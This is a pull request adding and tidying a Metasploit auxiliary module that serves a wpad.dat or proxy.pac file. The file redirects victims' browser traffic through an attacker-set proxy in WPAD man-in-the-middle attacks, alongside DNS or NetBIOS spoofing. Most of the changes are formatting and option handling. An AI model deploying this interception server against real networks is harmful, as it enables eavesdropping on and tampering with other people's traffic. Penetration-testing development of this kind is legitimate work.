### PR TITLE
Add WPAD.dat server aux module -- originally from #549

### DIFF
--- a/modules/auxiliary/server/wpad.rb
+++ b/modules/auxiliary/server/wpad.rb
@@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'        => 'WPAD.dat File Server',
 			'Version'     => '$Revision$',
 			'Description' => %q{
-				This module generates a valid wpad.dat file for WPAD mitm attacks.
- 				Usually this module is used in combination with DNS attacks or the
- 				'NetBIOS Name Service Spoofer' module. Please remember as the
+					This module generates a valid wpad.dat file for WPAD mitm 
+				attacks. Usually this module is used in combination with DNS attacks 
+				or the 'NetBIOS Name Service Spoofer' module. Please remember as the
  				server will be running by default on TCP port 80 you will need the
  				required privileges to open that port.
 			},

--- a/modules/auxiliary/server/wpad.rb
+++ b/modules/auxiliary/server/wpad.rb
@@ -21,7 +21,11 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'        => 'WPAD.dat File Server',
 			'Version'     => '$Revision$',
 			'Description' => %q{
-				This module generates a valid wpad.dat file for WPAD mitm attacks. 					Usually this module is used in combination with DNS attacks or the 					'NetBIOS Name Service Spoofer' module. Please remember as the 					server will be running by default on TCP port 80 you will need the 					required privileges to open that port.
+				This module generates a valid wpad.dat file for WPAD mitm attacks.
+ 				Usually this module is used in combination with DNS attacks or the
+ 				'NetBIOS Name Service Spoofer' module. Please remember as the
+ 				server will be running by default on TCP port 80 you will need the
+ 				required privileges to open that port.
 			},
 			'Author'      =>
 				[

--- a/modules/auxiliary/server/wpad.rb
+++ b/modules/auxiliary/server/wpad.rb
@@ -21,11 +21,11 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'        => 'WPAD.dat File Server',
 			'Version'     => '$Revision$',
 			'Description' => %q{
-					This module generates a valid wpad.dat file for WPAD mitm 
-				attacks. Usually this module is used in combination with DNS attacks 
+					This module generates a valid wpad.dat file for WPAD mitm
+				attacks. Usually this module is used in combination with DNS attacks
 				or the 'NetBIOS Name Service Spoofer' module. Please remember as the
- 				server will be running by default on TCP port 80 you will need the
- 				required privileges to open that port.
+				server will be running by default on TCP port 80 you will need the
+				required privileges to open that port.
 			},
 			'Author'      =>
 				[
@@ -41,9 +41,9 @@ class Metasploit3 < Msf::Auxiliary
 				[
 					'WebServer'
 				],
-			'DefaultOptions' => 
-				{ 
-					'SRVPORT' => 80 
+			'DefaultOptions' =>
+				{
+					'SRVPORT' => 80
 				},
 			'DefaultAction'  => 'WebServer'))
 
@@ -56,16 +56,15 @@ class Metasploit3 < Msf::Auxiliary
 				OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])
 			], self.class)
 	end
-	
+
 	def on_request_uri(cli, request)
 		print_status("Request '#{request.method} #{request.headers['user-agent']} from #{cli.peerhost}:#{cli.peerport}")
-
 
 		return if request.method == "POST"
 
 		html = <<-EOS
 function FindProxyForURL(url, host) {
-      // URLs within this network are accessed directly 
+      // URLs within this network are accessed directly
       if (isInNet(host, "#{datastore['EXCLUDENETWORK']}", "#{datastore['EXCLUDENETMASK']}"))
       {
          return "DIRECT";

--- a/modules/auxiliary/server/wpad.rb
+++ b/modules/auxiliary/server/wpad.rb
@@ -33,19 +33,11 @@ class Metasploit3 < Msf::Auxiliary
 				],
 			'Version'     => '$Revision$',
 			'License'     => MSF_LICENSE,
-			'Actions'     =>
-				[
-					[ 'WebServer' ]
-				],
-			'PassiveActions' =>
-				[
-					'WebServer'
-				],
 			'DefaultOptions' =>
 				{
 					'SRVPORT' => 80
 				},
-			'DefaultAction'  => 'WebServer'))
+			'Passive' => true))
 
 		register_options(
 			[

--- a/modules/auxiliary/server/wpad.rb
+++ b/modules/auxiliary/server/wpad.rb
@@ -1,8 +1,4 @@
 ##
-# $Id$
-##
-
-##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
@@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'        => 'WPAD.dat File Server',
-			'Version'     => '$Revision$',
 			'Description' => %q{
 					This module generates a valid wpad.dat file for WPAD mitm
 				attacks. Usually this module is used in combination with DNS attacks
@@ -31,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
 				[
 					'et'            # Metasploit module
 				],
-			'Version'     => '$Revision$',
 			'License'     => MSF_LICENSE,
 			'DefaultOptions' =>
 				{
@@ -41,16 +35,24 @@ class Metasploit3 < Msf::Auxiliary
 
 		register_options(
 			[
-				OptString.new('URIPATH',[ true, "WPAD/PAC Data file name (wpad.dat, proxy.pac)", '/wpad.dat' ]),
+				OptEnum.new('TYPE', [true, 'WPAD/PAC Data File', 'DAT', ['DAT', 'PAC']]),
 				OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),
 				OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),
 				OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),
 				OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])
 			], self.class)
+
+		deregister_options('URIPATH')
 	end
 
+
+	def cleanup
+		datastore['URIPATH'] = @previous_uri
+	end
+
+
 	def on_request_uri(cli, request)
-		print_status("Request '#{request.method} #{request.headers['user-agent']} from #{cli.peerhost}:#{cli.peerport}")
+		print_status("Request '#{request.method} #{request.headers['user-agent']}")
 
 		return if request.method == "POST"
 
@@ -72,9 +74,23 @@ EOS
 			})
 	end
 
+
 	def run
-		print_status("WPAD Server started on port #{datastore['SRVPORT']}.")
-		exploit
+		@previous_uri = datastore['URIPATH']
+		datastore['URIPATH'] = (datastore['TYPE'] == 'DAT') ? 'wpad.dat' : 'proxy.pac'
+
+		print_status("Serving #{datastore['URIPATH']} on port #{datastore['SRVPORT']}")
+
+		begin
+			exploit
+		rescue Errno::EACCES => e
+			if e.message =~ /Permission denied - bind/
+				print_error("You need to have permission to bind to #{datastore['SRVPORT']}")
+			else
+				raise e
+			end
+		end
 	end
+
 end
 

--- a/modules/auxiliary/server/wpad.rb
+++ b/modules/auxiliary/server/wpad.rb
@@ -1,0 +1,85 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'WPAD.dat File Server',
+			'Version'     => '$Revision$',
+			'Description' => %q{
+				This module generates a valid wpad.dat file for WPAD mitm attacks. 					Usually this module is used in combination with DNS attacks or the 					'NetBIOS Name Service Spoofer' module. Please remember as the 					server will be running by default on TCP port 80 you will need the 					required privileges to open that port.
+			},
+			'Author'      =>
+				[
+					'et'            # Metasploit module
+				],
+			'Version'     => '$Revision$',
+			'License'     => MSF_LICENSE,
+			'Actions'     =>
+				[
+					[ 'WebServer' ]
+				],
+			'PassiveActions' =>
+				[
+					'WebServer'
+				],
+			'DefaultOptions' => 
+				{ 
+					'SRVPORT' => 80 
+				},
+			'DefaultAction'  => 'WebServer'))
+
+		register_options(
+			[
+				OptString.new('URIPATH',[ true, "WPAD/PAC Data file name (wpad.dat, proxy.pac)", '/wpad.dat' ]),
+				OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),
+				OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),
+				OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),
+				OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])
+			], self.class)
+	end
+	
+	def on_request_uri(cli, request)
+		print_status("Request '#{request.method} #{request.headers['user-agent']} from #{cli.peerhost}:#{cli.peerport}")
+
+
+		return if request.method == "POST"
+
+		html = <<-EOS
+function FindProxyForURL(url, host) {
+      // URLs within this network are accessed directly 
+      if (isInNet(host, "#{datastore['EXCLUDENETWORK']}", "#{datastore['EXCLUDENETMASK']}"))
+      {
+         return "DIRECT";
+      }
+      return "PROXY #{datastore['PROXY']}:#{datastore['PROXYPORT']}; DIRECT";
+   }
+EOS
+
+		print_status("Sending WPAD config ...")
+		send_response_html(cli, html,
+			{
+				'Content-Type' => 'application/x-ns-proxy-autoconfig'
+			})
+	end
+
+	def run
+		print_status("WPAD Server started on port #{datastore['SRVPORT']}.")
+		exploit
+	end
+end
+


### PR DESCRIPTION
From pull request #549. Changes include:
- Use OptEnum to enforce the use of wpad.dat or proxy.pac
- Remove cli.peerhost:cli.peerport, the API does that already
- cleanup function to restore uripath datastore option
- More friendly error when the user doesn't have enough permission
  to bind to port 80, that way they don't blame it's a bug on msf.
- Remove unnecessary SVN stuff in modinfo.
